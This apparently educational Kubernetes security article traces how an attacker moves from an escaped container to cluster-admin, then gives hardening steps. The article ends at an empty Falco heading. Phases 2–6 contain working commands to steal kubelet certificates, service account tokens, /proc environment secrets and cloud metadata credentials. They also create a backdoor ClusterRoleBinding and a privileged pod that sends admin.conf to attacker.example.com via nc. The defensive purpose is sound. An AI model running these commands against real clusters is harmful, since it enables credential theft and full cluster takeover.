From Pod Breakout to Kubelet Credential Theft: The Node Compromise Attack Chain

The Problem

Getting code execution inside a container is not the end of the attack — it is the beginning. For most attackers, the container is an entry point into the Kubernetes node, and the node is an entry point into the cluster. The post-escape attack chain is well-understood, repeatable, and fast: from an escaped container to cluster-level API access in under five minutes on a default Kubernetes installation. Yet most Kubernetes security tooling focuses on preventing the initial escape and treats post-escape activity as out of scope.

This article maps the full attack chain from the attacker’s perspective, starting the clock at the moment of container escape. The initial escape mechanism — whether CVE-2022-0847 (Dirty Pipe), runc CVE-2019-5736, or a straightforward --privileged pod misconfiguration — does not substantially change what happens next. What matters is that the attacker now has code execution on the host as root. Everything that follows is determined by what Kubernetes leaves on the node filesystem, and by default Kubernetes leaves a great deal.

The attack proceeds in six phases: establish node access and confirm the environment, harvest the kubelet’s TLS credentials, enumerate the cluster using the node’s API server identity, extract secrets from co-located pod processes, steal cloud IAM credentials from the instance metadata service, and escalate to cluster-admin. Each phase uses artifacts that Kubernetes places on every node by design. None of this is novel. All of it works on a default cluster with no additional misconfiguration beyond the initial container escape.

Phase 1: Establish Node Access and Confirm the Environment

The first actions after escape confirm the attacker is on the node rather than still inside a container, and identify the target environment:

# Confirm we are on the node, not inside a container
# A container's PID 1 shows /docker/<id> or /kubepods/... in its cgroup paths
cat /proc/1/cgroup | head -5
# On the node host, PID 1 is the init system, so the output looks like:
# 12:cpuset:/
# 1:name=systemd:/init.scope
# Not: 12:cpuset:/kubepods/burstable/pod<uid>/<containerid>

# Kubelet data directory confirms Kubernetes node
ls /var/lib/kubelet/
# config.yaml  kubeconfig  pki/  plugins/  pods/  ...

# Kernel version — useful for identifying additional LPE opportunities
uname -r

# Node name — used later to correlate which pods are scheduled here
hostname
# ip-10-0-1-142.eu-west-1.compute.internal

# Cloud provider detection
curl -s -m 2 http://169.254.169.254/latest/meta-data/instance-id 2>/dev/null && echo "AWS"
curl -s -m 2 -H "Metadata-Flavor: Google" http://metadata.google.internal/ 2>/dev/null && echo "GCP"

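The cgroup check is a quick escape confirmation, though not a conclusive one. A container’s PID 1 normally appears under /kubepods/ in the cgroup hierarchy, while the host’s PID 1 sits in the root cgroup or /init.scope. On cgroup v2 nodes with cgroup namespaces, a container can also see 0::/, so cross-check against the presence of /var/lib/kubelet/ and the full host process list.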
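
The same classification can be written as a small helper, which is also handy for defenders labelling processes during incident response. This is a minimal sketch: the marker list and the function name are illustrative assumptions, and a path of / is treated as "not a container" even though a cgroup namespace can hide the real path.

```python
# Hypothetical marker list; extend it for the container runtimes in your fleet.
CONTAINER_MARKERS = ("/kubepods", "/docker/", "/crio-")


def looks_like_container(cgroup_text: str) -> bool:
    """Return True if any cgroup path in the text points at a container cgroup.

    cgroup_text is the content of a /proc/<pid>/cgroup file, where each line
    has the form "hierarchy-id:controllers:path".
    """
    for line in cgroup_text.splitlines():
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue  # skip malformed or empty lines
        path = parts[2]
        if any(marker in path for marker in CONTAINER_MARKERS):
            return True
    return False
```

Feeding it the text of /proc/1/cgroup reproduces the manual check; a False result still needs the cross-checks described above.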

Phase 2: Harvest Kubelet Credentials

The kubelet authenticates to the Kubernetes API server using TLS client certificates. These certificates are stored on the node filesystem by design — the kubelet needs them on every startup. They are the most valuable artifact on the node:

# Kubelet TLS credentials directory
ls -la /var/lib/kubelet/pki/
# -rw------- 1 root root 2794 May  1 09:14 kubelet-client-2026-05-01-09-14-32.pem
# lrwxrwxrwx 1 root root   67 May  1 09:14 kubelet-client-current.pem -> /var/lib/kubelet/pki/kubelet-client-2026-05-01-09-14-32.pem
# -rw-r--r-- 1 root root 2187 Apr 18 12:04 kubelet.crt
# -rw------- 1 root root 1675 Apr 18 12:04 kubelet.key

# kubelet-client-current.pem contains both private key and certificate in one PEM file
# This single file is sufficient to authenticate as the node identity to the API server
cat /var/lib/kubelet/pki/kubelet-client-current.pem

The kubelet-client-current.pem file is a symlink to the most recently rotated credential. It contains the private key and certificate concatenated in a single PEM file. The certificate’s Subject is CN=system:node:<nodename>,O=system:nodes — this is the identity the API server recognises.

Also check for a kubeconfig, which often contains the API server address in a form that is more convenient than reconstructing it:

# Kubelet kubeconfig — contains API server address and CA certificate
cat /var/lib/kubelet/kubeconfig
# server: https://10.0.0.1:6443  ← note this address

# API server CA certificate — needed to verify the server's TLS certificate
ls /etc/kubernetes/pki/ca.crt
# Or sometimes at:
ls /var/lib/kubelet/pki/ca.crt

Verify the credentials work before exfiltrating them. A working authentication confirms the node identity is valid and gives a baseline of what the API server is willing to discuss:

APISERVER=$(cat /var/lib/kubelet/kubeconfig | grep server | awk '{print $2}')
CERT=/var/lib/kubelet/pki/kubelet-client-current.pem
CACERT=/etc/kubernetes/pki/ca.crt

# Test authentication: returns this node's own Node object if the credentials are valid
curl -s \
  --cert $CERT \
  --key $CERT \
  --cacert $CACERT \
  $APISERVER/api/v1/nodes/$(hostname) \
  | python3 -m json.tool | head -20

A successful response confirms the credentials are valid and the API server is reachable from the node (it always is — the kubelet talks to it continuously). If the CA cert is not at /etc/kubernetes/pki/ca.crt, check /etc/kubernetes/ssl/, /etc/ssl/certs/kubernetes/, or read the certificate-authority-data field from the kubeconfig and base64-decode it.
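
Decoding the inline CA bundle is a one-step base64 operation. The sketch below assumes the kubeconfig embeds the CA as a certificate-authority-data field and uses a regular expression rather than a YAML parser to stay within the standard library; extract_ca_pem is an illustrative name, not part of any Kubernetes tooling.

```python
import base64
import re


def extract_ca_pem(kubeconfig_text: str):
    """Return the decoded CA bundle from certificate-authority-data, or None.

    None means the field is absent, in which case the kubeconfig most likely
    points at a CA file through certificate-authority instead.
    """
    match = re.search(
        r"^\s*certificate-authority-data:\s*(\S+)\s*$",
        kubeconfig_text,
        re.MULTILINE,
    )
    if match is None:
        return None
    return base64.b64decode(match.group(1)).decode("ascii")
```

The returned PEM text can be written to a file and passed to curl via --cacert.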

Phase 3: Enumerate the Cluster Using the Node Identity

The node identity system:node:<nodename> in the system:nodes group has permissions granted by the Node Authorizer, a dedicated Kubernetes authorization mode. These permissions are documented but often not fully understood by cluster operators:

KUBECTL="kubectl --client-certificate=$CERT --client-key=$CERT --certificate-authority=$CACERT --server=$APISERVER"

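# What can this identity actually do?
# Note: the Node authorizer does not support rule listing, so treat this output as
# illustrative and possibly incomplete; confirm specific permissions with direct requests
$KUBECTL auth can-i --list 2>/dev/null | grep -v "^no\b" | head -30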
# Resources                     Non-Resource URLs   Resource Names   Verbs
# nodes                         []                  [ip-10-0-1-142]  [get patch update]
# pods                          []                  []               [get list watch]
# secrets                       []                  []               [get]
# services                      []                  []               [get list watch]
# endpoints                     []                  []               [get list watch]
# configmaps                    []                  []               [get list watch]
# ...

# List all pods on this specific node across all namespaces
$KUBECTL get pods --all-namespaces \
  --field-selector spec.nodeName=$(hostname) \
  -o wide

The Node Authorizer, enabled with --authorization-mode=Node,RBAC in the API server, restricts what node identities can do. But the permitted scope is still significant: the node identity can get and list pods scheduled to its node, read secrets that are mounted into pods on its node, and read configmaps and service account tokens used by those pods. The critical restriction is that the node identity cannot list secrets cluster-wide; it can only read secrets that are referenced by pods on that specific node. In practice this is a large set, because most production pods reference at least one secret (database credentials, TLS keys, image pull secrets), and the node identity can read all of them through the API.

# Get detailed info on a specific pod to identify mounted secrets
$KUBECTL get pod -n production payment-service-7d9f8c-xkp2q -o json \
  | python3 -m json.tool \
  | grep -A5 '"secretName"'
# "secretName": "payment-service-db-creds"
# "secretName": "tls-cert-prod"

# Read a mounted secret directly through the API
$KUBECTL get secret payment-service-db-creds -n production -o json \
  | python3 -c "
import json, sys, base64
s = json.load(sys.stdin)
for k, v in s['data'].items():
    print(f'{k}: {base64.b64decode(v).decode()}')
"
# DB_HOST: prod-postgres.internal:5432
# DB_PASSWORD: xK9mP2qR8nL4vT7w

The Node Authorizer limits secret access to secrets bound to pods on this node, but a node can run up to 110 pods by default (the kubelet’s maxPods setting), and a busy production node running 40 pods may have 40 or more distinct secret objects accessible.
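
To size that exposure for a given node, the secret names can be pulled out of each pod spec. The following is a minimal sketch that works on the JSON returned by kubectl get pod -o json; referenced_secrets is an illustrative helper name, and it covers the common reference types (secret volumes, projected volume sources, environment references, and image pull secrets).

```python
def referenced_secrets(pod: dict) -> set:
    """Collect the names of all Secret objects a pod spec refers to."""
    spec = pod.get("spec", {})
    names = set()

    for volume in spec.get("volumes", []):
        if "secret" in volume:
            names.add(volume["secret"]["secretName"])
        for source in volume.get("projected", {}).get("sources", []):
            if "secret" in source:
                names.add(source["secret"]["name"])

    for pull_secret in spec.get("imagePullSecrets", []):
        names.add(pull_secret["name"])

    containers = spec.get("containers", []) + spec.get("initContainers", [])
    for container in containers:
        for env in container.get("env", []):
            ref = env.get("valueFrom", {}).get("secretKeyRef")
            if ref:
                names.add(ref["name"])
        for source in container.get("envFrom", []):
            if "secretRef" in source:
                names.add(source["secretRef"]["name"])

    return names
```

Running this over every pod scheduled to a node gives the set of secrets that node’s identity is expected to be able to read.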

Phase 4: Extract Secrets from Co-Located Pod Processes

The API-based approach requires knowing which secrets are mounted. A complementary approach reads secrets directly from each process’s environment through the host’s /proc filesystem, without touching the Kubernetes API at all. This bypasses audit logging at the API server level entirely:

# Scan /proc/<pid>/environ for all running processes
# Covers every process on the node, including containers, host services, and kube-system pods
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
  environ_file=/proc/$pid/environ
  if [ -f "$environ_file" ]; then
    env=$(cat "$environ_file" 2>/dev/null | tr '\0' '\n')
    if echo "$env" | grep -qE "AWS_|GITHUB_TOKEN|DATABASE_URL|DB_PASS|SECRET|TOKEN|KEY|PASSWD|PASSWORD"; then
      comm=$(cat /proc/$pid/comm 2>/dev/null)
      cgroup=$(cat /proc/$pid/cgroup 2>/dev/null | head -1)
      echo "=== PID $pid ($comm) ==="
      echo "cgroup: $cgroup"
      echo "$env" | grep -E "AWS_|GITHUB_TOKEN|DATABASE_URL|DB_PASS|SECRET|TOKEN|KEY|PASSWD|PASSWORD"
      echo ""
    fi
  fi
done

The /proc/<pid>/environ file is readable by root and contains the complete environment of the process at the time it was launched. Environment variables are a common — and persistent — way to inject secrets into containerised processes: database passwords, API tokens, AWS credentials, JWT signing keys, Stripe keys, SendGrid API keys. Any secret injected as a Kubernetes Secret via env[].valueFrom.secretKeyRef ends up in the process environment and is readable through this path.
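
The environ format itself is simple: NAME=value entries separated by NUL bytes. The sketch below shows how a defender might audit which sensitive-looking variable names a workload exposes, reporting names only and never values. The pattern and the function name are illustrative assumptions and are narrower than the grep expression used above.

```python
import re

# Hypothetical name pattern; tune it to your organisation's naming conventions.
SENSITIVE_NAME = re.compile(r"SECRET|TOKEN|PASSWORD|PASSWD|KEY", re.IGNORECASE)


def sensitive_env_names(environ_bytes: bytes) -> list:
    """Return sorted variable names that look sensitive.

    environ_bytes is the raw content of a /proc/<pid>/environ file.
    """
    names = []
    for entry in environ_bytes.split(b"\0"):
        if b"=" not in entry:
            continue  # skip the trailing empty entry and malformed data
        name = entry.split(b"=", 1)[0].decode("utf-8", "replace")
        if SENSITIVE_NAME.search(name):
            names.append(name)
    return sorted(names)
```

Any name this reports is a candidate for moving out of the environment and into a mounted file or an external secret store.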

# Additional method: read mounted secrets from the kubelet's pod volume directory
# The kubelet stores secret volume contents on the host filesystem
find /var/lib/kubelet/pods -type f \( -name "*.token" -o -name "token" -o -name "*.key" -o -name "ca.crt" \) 2>/dev/null

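# Service account tokens for all pods on this node are here.
# Clusters since v1.21 mount them as projected volumes (kubernetes.io~projected);
# older clusters use secret volumes (kubernetes.io~secret).
find /var/lib/kubelet/pods -path "*/volumes/kubernetes.io~*/*/token" 2>/dev/null \
  | while read -r f; do
      pod_uid=$(echo "$f" | awk -F/ '{print $6}')
      echo "=== Pod UID: $pod_uid ==="
      cat "$f"
      echo ""
    done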

Service account tokens found under /var/lib/kubelet/pods/<uid>/volumes/ are JWTs that authenticate to the Kubernetes API with the service account’s permissions. On current clusters they sit in kubernetes.io~projected/<name>/token and are short-lived and bound to the pod; legacy tokens in kubernetes.io~secret/<name>/token do not expire. A service account with a ClusterRoleBinding to cluster-admin, which exists in many clusters for Helm operators, monitoring tools, or CI deployments, gives cluster-admin access.

Decode and inspect any token to understand its permissions:

TOKEN=$(cat /var/lib/kubelet/pods/<uid>/volumes/kubernetes.io~secret/default-token-xxxxx/token)

# Decode the JWT payload (base64url, no signature verification needed for inspection)
echo $TOKEN | cut -d. -f2 | tr '_-' '/+' | base64 -d 2>/dev/null | python3 -m json.tool
# {
#   "iss": "kubernetes/serviceaccount",
#   "kubernetes.io/serviceaccount/namespace": "monitoring",
#   "kubernetes.io/serviceaccount/service-account.name": "prometheus",
#   ...
# }

# Test what this service account can do
kubectl --token="$TOKEN" --server=$APISERVER --certificate-authority=$CACERT auth can-i --list
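
The shell pipeline above can fail silently because base64url payloads usually arrive without padding. A minimal Python sketch that restores the padding before decoding is shown here; jwt_claims is an illustrative name, and the function inspects the claims without verifying the signature.

```python
import base64
import json


def jwt_claims(token: str) -> dict:
    """Decode the payload segment of a JWT without verifying its signature."""
    payload = token.split(".")[1]
    # base64url strings omit '=' padding; restore it to a multiple of four.
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))
```

For incident response, the exp and iss claims indicate whether a recovered token is a long-lived legacy token or a time-bound one.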

Phase 5: Cloud IMDS Credential Theft

If the cluster runs on a cloud provider, the instance metadata service (IMDS) is accessible from the node. Unlike pod-level IMDS access (which can be blocked at the network level with hop-limit controls), access from the node itself is always permitted — the node needs IMDS to function:

# AWS: get IAM role credentials
# First, identify the role name
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
echo "IAM Role: $ROLE"

# Get the temporary credentials
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE
# {
#   "Code": "Success",
#   "Type": "AWS-HMAC",
#   "AccessKeyId": "ASIA...",
#   "SecretAccessKey": "...",
#   "Token": "...",
#   "Expiration": "2026-05-09T06:22:00Z"
# }

# GCP: get the default service account access token
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# {"access_token":"ya29....","expires_in":3599,"token_type":"Bearer"}

# Also: get all scopes the service account has
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes

# Azure: get an access token for Azure Resource Manager
curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# {"access_token":"eyJ0...","client_id":"...","expires_in":"86391",...}

The node’s IAM role is typically broader than pod IAM roles: nodes need EC2 permissions to describe their own instance, ECR permissions to pull images, EBS permissions for persistent volume management, and often CloudWatch permissions for logging. In EKS clusters, the node role is frequently over-permissioned because a single role is shared by every node in a managed node group, so permissions added for one workload end up on all of them.
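
A quick way to review a node role is to scan its policy documents for actions a node should not need. The sketch below is illustrative only: the default list of risky actions is an assumption rather than an authoritative baseline, matching is by exact action string (wildcard patterns such as ecr:Put* are not expanded), and risky_actions_in_policy is a hypothetical helper.

```python
# Hypothetical examples of actions a worker node role rarely needs.
DEFAULT_RISKY = ("*", "iam:*", "s3:*", "ecr:PutImage", "eks:UpdateAccessEntry")


def risky_actions_in_policy(policy: dict, risky=DEFAULT_RISKY) -> list:
    """Return Allow-ed actions from an IAM policy document that appear in risky.

    IAM action names are case-insensitive, so comparison is done in lowercase.
    """
    risky_lower = {action.lower() for action in risky}
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare object
        statements = [statements]

    findings = []
    for statement in statements:
        if statement.get("Effect") != "Allow":
            continue
        actions = statement.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        findings.extend(a for a in actions if a.lower() in risky_lower)
    return findings
```

An empty result does not prove the role is safe; it only means none of the listed actions is granted verbatim.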

With AWS credentials, check for EKS-specific escalation paths:

export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="..."
export AWS_SESSION_TOKEN="..."

# What identity is this?
aws sts get-caller-identity
# {
#   "UserId": "AROA...:i-0abc12345def67890",
#   "Account": "123456789012",
#   "Arn": "arn:aws:sts::123456789012:assumed-role/eks-node-role/i-0abc12345def67890"
# }

# Can this role update the aws-auth ConfigMap via SSM or direct IAM?
aws iam list-attached-role-policies --role-name eks-node-role

# Check if the node role can authenticate to ECR (needed for image pull)
# Pull access alone does not allow pushing malicious images; push also requires ecr:PutImage and the layer-upload actions
aws ecr get-login-password --region eu-west-1 | \
  docker login --username AWS --password-stdin 123456789012.dkr.ecr.eu-west-1.amazonaws.com

# Check what S3 buckets are accessible — state files, backups, secrets
aws s3 ls

# EKS-specific: modify a cluster access entry to grant an attacker-controlled role elevated groups
# (requires eks:UpdateAccessEntry and an existing access entry for the principal; sometimes present on an over-permissioned node role)
aws eks update-access-entry \
  --cluster-name production-cluster \
  --principal-arn arn:aws:iam::123456789012:role/attacker-role \
  --kubernetes-groups system:masters

Phase 6: Escalate to Cluster-Admin

The collected materials — node identity cert, service account tokens, cloud IAM credentials — now provide multiple paths to cluster-admin:

# Path 1: Find a co-located pod with a cluster-admin service account
$KUBECTL get pods --all-namespaces \
  --field-selector spec.nodeName=$(hostname) \
  -o json | \
  python3 -c "
import json, sys
pods = json.load(sys.stdin)['items']
for p in pods:
    sa = p['spec'].get('serviceAccountName','default')
    ns = p['metadata']['namespace']
    name = p['metadata']['name']
    anns = p['metadata'].get('annotations', {})
    iam_role = anns.get('iam.amazonaws.com/role') or anns.get('eks.amazonaws.com/role-arn')
    print(f'{ns}/{name}: sa={sa}' + (f' iam={iam_role}' if iam_role else ''))
"

# Path 2: Use a stolen cluster-admin token to create a backdoor ClusterRoleBinding
ADMIN_TOKEN=$(cat /var/lib/kubelet/pods/<uid>/volumes/kubernetes.io~secret/cluster-admin-token/token)

kubectl --token="$ADMIN_TOKEN" --server=$APISERVER --certificate-authority=$CACERT \
  create clusterrolebinding backdoor-admin \
  --clusterrole=cluster-admin \
  --serviceaccount=kube-system:attacker

# Path 3: With node identity, create a malicious pod in kube-system
# Node authorizer does NOT allow creating pods — but the node cert + a stolen token might
# Use the highest-privilege token found to create a privileged pod
kubectl --token="$ADMIN_TOKEN" --server=$APISERVER --certificate-authority=$CACERT \
  apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: breakout
  namespace: kube-system
spec:
  hostNetwork: true
  hostPID: true
  containers:
    - name: shell
      image: ubuntu:22.04
      command: ["/bin/bash", "-c", "nsenter -t 1 -m -u -i -n -- bash -c 'cat /etc/kubernetes/admin.conf | nc attacker.example.com 4444'"]
      securityContext:
        privileged: true
      volumeMounts:
        - name: host
          mountPath: /host
  volumes:
    - name: host
      hostPath:
        path: /
EOF

Threat Model

What the node identity can access. The system:node:<nodename> identity in the system:nodes group is authorized by the Node Authorizer. It can get and list pods scheduled to its node, get the secrets and configmaps referenced by those pods, get service account tokens bound to its pods, and update its own node object. It cannot list secrets cluster-wide, access pods on other nodes, or read cluster-level resources not bound to its pods. In practice, a busy production node with 40-60 pods has access to 40-60 secret objects through the API, all of which may contain production credentials.

What /proc exposes. Every process running on the node has an environ file readable by root. This includes all container processes, which run in their own PID namespaces but are still visible in /proc from the host. After a container escape, the attacker is root on the host. Process environments routinely contain database passwords, API keys, OAuth tokens, S3 credentials, and signing keys. This is not a Kubernetes-specific issue; it is the reality of secret injection into containerised processes. The /proc path bypasses Kubernetes audit logging entirely: no API call, no audit event, and no detection signal outside of syscall-level tracing such as Falco’s eBPF probes.

What IMDS exposes. The cloud instance metadata service is available from the node without authentication for IMDSv1. IMDSv2 requires a PUT request to obtain a session token, but from the node (not from a container with hop-limit enforcement), this is trivially satisfied. The node IAM role typically has ECR pull permissions (and sometimes push as well), CloudWatch put-log-events permissions, and EC2 describe permissions at minimum. In many organisations it also has access to S3 buckets containing Terraform state, which contains secrets.

Multi-tenant blast radius. In a multi-tenant cluster where different teams share nodes, a container escape from one team’s workload gives the attacker access to the secrets of every other team’s pods co-located on the same node. This is the argument for hard tenancy: separate node groups per tenant, with taints, tolerations, and node affinity keeping each tenant’s pods on its own nodes. Without it, the blast radius of a single container escape covers every tenant with a pod on the compromised node and, through their credentials, potentially the whole cluster.

Persistence mechanisms. After achieving cluster-admin access, an attacker can persist in multiple ways: create a ClusterRoleBinding granting a new service account cluster-admin; deploy a DaemonSet to every node with a persistent backdoor; modify the kube-system/aws-auth ConfigMap (EKS) to add a backdoor IAM role; push a malicious image to the cluster’s registry and modify a Deployment to pull it. The stolen kubelet cert itself has a limited lifetime, but Kubernetes does not check certificate revocation, so it stays usable until its notAfter date (up to a year with the default signing duration, even if the kubelet rotates in the meantime). Any higher-level access obtained with it persists until explicitly revoked.

Hardening Configuration

1. Enable and Verify the NodeRestriction Admission Plugin

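The NodeRestriction admission plugin limits what a node identity can write: a kubelet may modify only its own Node object and the pods bound to it, and it cannot set or change labels under the node-restriction.kubernetes.io/ prefix. Without it, a stolen node credential can modify other nodes’ objects and labels, for example to attract sensitive workloads to the compromised node: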

# Verify NodeRestriction is enabled in the API server
ps aux | grep kube-apiserver | tr ' ' '\n' | grep admission
# --enable-admission-plugins=NodeRestriction,PodSecurity,...

# Or check the manifest
cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep admission-plugins

Even with NodeRestriction enabled, verify what the node identity can actually do — the effective permissions matter, not just the plugin’s presence:

# From the node, using the kubelet cert, check effective permissions
kubectl --client-certificate=/var/lib/kubelet/pki/kubelet-client-current.pem \
        --client-key=/var/lib/kubelet/pki/kubelet-client-current.pem \
        --certificate-authority=/etc/kubernetes/pki/ca.crt \
        --server=$(cat /var/lib/kubelet/kubeconfig | grep server | awk '{print $2}') \
        auth can-i --list 2>&1 | \
        grep -E "^(secrets|pods|configmaps|nodes)" | \
        awk '{print $1, $NF}'

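Because the Node authorizer does not support rule listing, auth can-i --list mostly reflects RBAC bindings and may be incomplete. Any entry showing secrets with get, list, or watch and no resource-name restriction means an RBAC binding grants the node broad secret access, which is a misconfiguration: secrets access should come only from the Node authorizer, scoped to secrets referenced by pods on this specific node.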

2. Protect Kubelet PKI File Permissions

The kubelet credential files are the primary escalation artifact. Their permissions must be verified and enforced continuously:

# Audit kubelet PKI permissions on a single node
# Private material lives in *.pem and *.key; kubelet.crt is a public certificate and may be 644
# -type f skips the kubelet-client-current.pem symlink, which always reports mode 777
find /var/lib/kubelet/pki -maxdepth 1 -type f \( -name "*.pem" -o -name "*.key" \) \
  -exec stat --format="%a %U %G %n" {} \; | \
  awk '$1 != "600" || $2 != "root" || $3 != "root" { print "INSECURE: " $0 }'

# Fleet-wide check via SSH or your node management tooling
for node in $(kubectl get nodes -o jsonpath='{.items[*].metadata.name}'); do
  ssh "$node" "find /var/lib/kubelet/pki -type f \( -name '*.pem' -o -name '*.key' \) | xargs stat --format='%a %n' | awk '\$1 != \"600\" {print \"$node: INSECURE: \" \$0}'"
done

Enforce permissions with a systemd drop-in for the kubelet service. The kubelet creates these files, so a hook that runs each time the kubelet starts is a natural place to reset them:

# /etc/systemd/system/kubelet.service.d/50-pki-permissions.conf
[Service]
ExecStartPost=/bin/bash -c 'chmod 600 /var/lib/kubelet/pki/*.pem /var/lib/kubelet/pki/*.key 2>/dev/null; chown root:root /var/lib/kubelet/pki/*.pem /var/lib/kubelet/pki/*.key 2>/dev/null; true'

This is defence in depth rather than a barrier against host root. An escape that lands as a non-root host user, for example from a container running under user namespaces, can read kubelet keys only if they are group- or world-readable. An attacker who already has root on the host can read them regardless of file mode.
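
The same audit can be expressed in Python for use inside a node agent or a compliance check. This is a sketch under stated assumptions: insecure_key_files and its expected_uid parameter are illustrative names, symlinks are skipped so that only the real key files are judged, and public .crt files are ignored.

```python
import os
import stat


def insecure_key_files(pki_dir: str, expected_uid: int = 0) -> list:
    """Return (path, octal mode) for key files that others could read.

    A file is flagged when any group/other permission bit is set or when it
    is not owned by expected_uid (root by default).
    """
    findings = []
    for entry in sorted(os.listdir(pki_dir)):
        path = os.path.join(pki_dir, entry)
        if not entry.endswith((".pem", ".key")):
            continue  # .crt files hold public certificates only
        if os.path.islink(path) or not os.path.isfile(path):
            continue  # judge the symlink target, not the link itself
        info = os.stat(path)
        mode = stat.S_IMODE(info.st_mode)
        if mode & 0o077 or info.st_uid != expected_uid:
            findings.append((path, format(mode, "o")))
    return findings
```

Calling insecure_key_files("/var/lib/kubelet/pki") on a healthy node should return an empty list.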

3. Block Cloud IMDS from Pod Network Namespaces

Blocking IMDS access from pods prevents a compromised container from stealing the node’s cloud credentials without ever escaping. After a full node escape, the attacker has host-level IMDS access regardless, but blocking at the pod level raises the bar:

# Block pod access to IMDS using iptables on each node
# The FORWARD chain only sees traffic routed through the host, so this covers pods
# in their own network namespace; hostNetwork pods are not affected
# Add to node bootstrap or DaemonSet configuration

# AWS IMDS and the GCP metadata server (metadata.google.internal) share this IPv4 address
iptables -I FORWARD -d 169.254.169.254/32 -j DROP

# AWS IPv6 IMDS endpoint: IPv6 rules need ip6tables
ip6tables -I FORWARD -d fd00:ec2::254/128 -j DROP

# Make persistent across reboots (paths used by Debian's iptables-persistent)
iptables-save > /etc/iptables/rules.v4
ip6tables-save > /etc/iptables/rules.v6

For AWS, the strongest control is IMDSv2 with a hop limit of 1. The hop limit sets the IP TTL on the response to the token-fetching PUT request, so only a caller on the instance itself receives the token. A container in its own network namespace sits one routing hop further away, and the response is dropped before it arrives:

# Require IMDSv2 and set hop limit 1 on all nodes
# Best done at node launch time via instance configuration in the node group's launch template

# Fetch the instance ID with an IMDSv2 token so the lookup keeps working once tokens are required
IMDS_TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 300")
INSTANCE_ID=$(curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
  http://169.254.169.254/latest/meta-data/instance-id)

aws ec2 modify-instance-metadata-options \
  --instance-id "$INSTANCE_ID" \
  --http-put-response-hop-limit 1 \
  --http-endpoint enabled \
  --http-tokens required

# Verify the configuration
aws ec2 describe-instances \
  --instance-ids "$INSTANCE_ID" \
  --query 'Reservations[0].Instances[0].MetadataOptions'
# {
#   "State": "applied",
#   "HttpTokens": "required",
#   "HttpPutResponseHopLimit": 1,
#   "HttpEndpoint": "enabled"
# }

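With HttpPutResponseHopLimit: 1 and HttpTokens: required, a container’s PUT token request gets no answer: the response leaves IMDS with a TTL of 1 and is discarded when the host forwards it into the container’s network namespace, so the client times out. Without a token, metadata GET requests are rejected with 401. Processes in the host network namespace, including hostNetwork pods, can still reach IMDS directly.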
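
The hop-limit behaviour follows from ordinary IP TTL handling, which can be captured in a toy model. This is a simplified sketch, not a description of AWS internals: response_arrives and its parameters are illustrative, and forwarding_hops counts how many times the token response is routed after it reaches the instance (0 for a host process, 1 for a typical pod behind the host’s routing).

```python
def response_arrives(hop_limit: int, forwarding_hops: int) -> bool:
    """Model whether the IMDSv2 token response reaches the caller.

    Each forwarding step decrements the TTL; a packet whose TTL reaches zero
    while it still needs forwarding is dropped.
    """
    ttl = hop_limit
    for _ in range(forwarding_hops):
        ttl -= 1
        if ttl <= 0:
            return False
    return True
```

In this model a host process (forwarding_hops=0) always receives the token, a pod one hop away is blocked at hop limit 1, and the same pod succeeds at hop limit 2, which is why raising the hop limit re-exposes node credentials to pods.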

4. Enable Kubelet Certificate Rotation and Set Short Validity

Certificate rotation does not invalidate a stolen certificate, but it is what makes short validity periods practical. With rotation enabled, the kubelet automatically requests a new certificate before the current one expires, so the signing duration can be cut without manual renewal:

# Verify certificate rotation is configured in kubelet config
cat /var/lib/kubelet/config.yaml | grep -E "rotate|serverTLS"
# rotateCertificates: true
# serverTLSBootstrap: true

# Check current certificate expiry
openssl x509 -in /var/lib/kubelet/pki/kubelet-client-current.pem \
  -noout -dates -subject
# notBefore=May  1 09:14:32 2026 GMT
# notAfter=Jun  1 09:14:32 2026 GMT  ← 31-day validity in this example (the default signing duration is 1 year)
# subject=CN = system:node:ip-10-0-1-142.eu-west-1.compute.internal, O = system:nodes

# Verify CSR approval is working (kubelet client CSRs should show Approved,Issued)
kubectl get csr | grep "kube-apiserver-client-kubelet" | head -5

With default settings, the controller manager signs kubelet client certificates for 1 year. Reduce this to 24 hours with the kube-controller-manager’s --cluster-signing-duration flag:

# kube-controller-manager configuration
# --cluster-signing-duration=24h
# This caps the validity of every certificate issued through the CSR API

# Verify current setting (kubeadm static pods are named kube-controller-manager-<node>, so select by label)
kubectl -n kube-system get pod -l component=kube-controller-manager -o yaml | \
  grep cluster-signing-duration

A 24-hour certificate validity means a stolen kubelet cert expires within 24 hours of issuance, limiting the window for credential reuse.
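
The exposure window for a stolen certificate is simply the time left until notAfter. The sketch below computes it from the date strings that openssl x509 -dates prints; parse_openssl_date and exposure_window are illustrative helper names, and the parser assumes the GMT-suffixed format shown in the output above.

```python
from datetime import datetime, timedelta, timezone


def parse_openssl_date(value: str) -> datetime:
    """Parse an openssl date such as 'May  1 09:14:32 2026 GMT' as UTC."""
    fields = value.split()  # also collapses the padded day-of-month spacing
    if len(fields) != 5 or fields[-1] != "GMT":
        raise ValueError(f"unexpected date format: {value!r}")
    naive = datetime.strptime(" ".join(fields[:-1]), "%b %d %H:%M:%S %Y")
    return naive.replace(tzinfo=timezone.utc)


def exposure_window(not_after: str, stolen_at: datetime) -> timedelta:
    """Return how long a certificate stolen at stolen_at remains usable."""
    remaining = parse_openssl_date(not_after) - stolen_at
    return max(remaining, timedelta(0))
```

Subtracting the parsed notBefore from notAfter gives the configured validity, which makes it easy to confirm that a shortened signing duration has actually taken effect.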

5. Falco Detection Rules for Post-Escape Activity

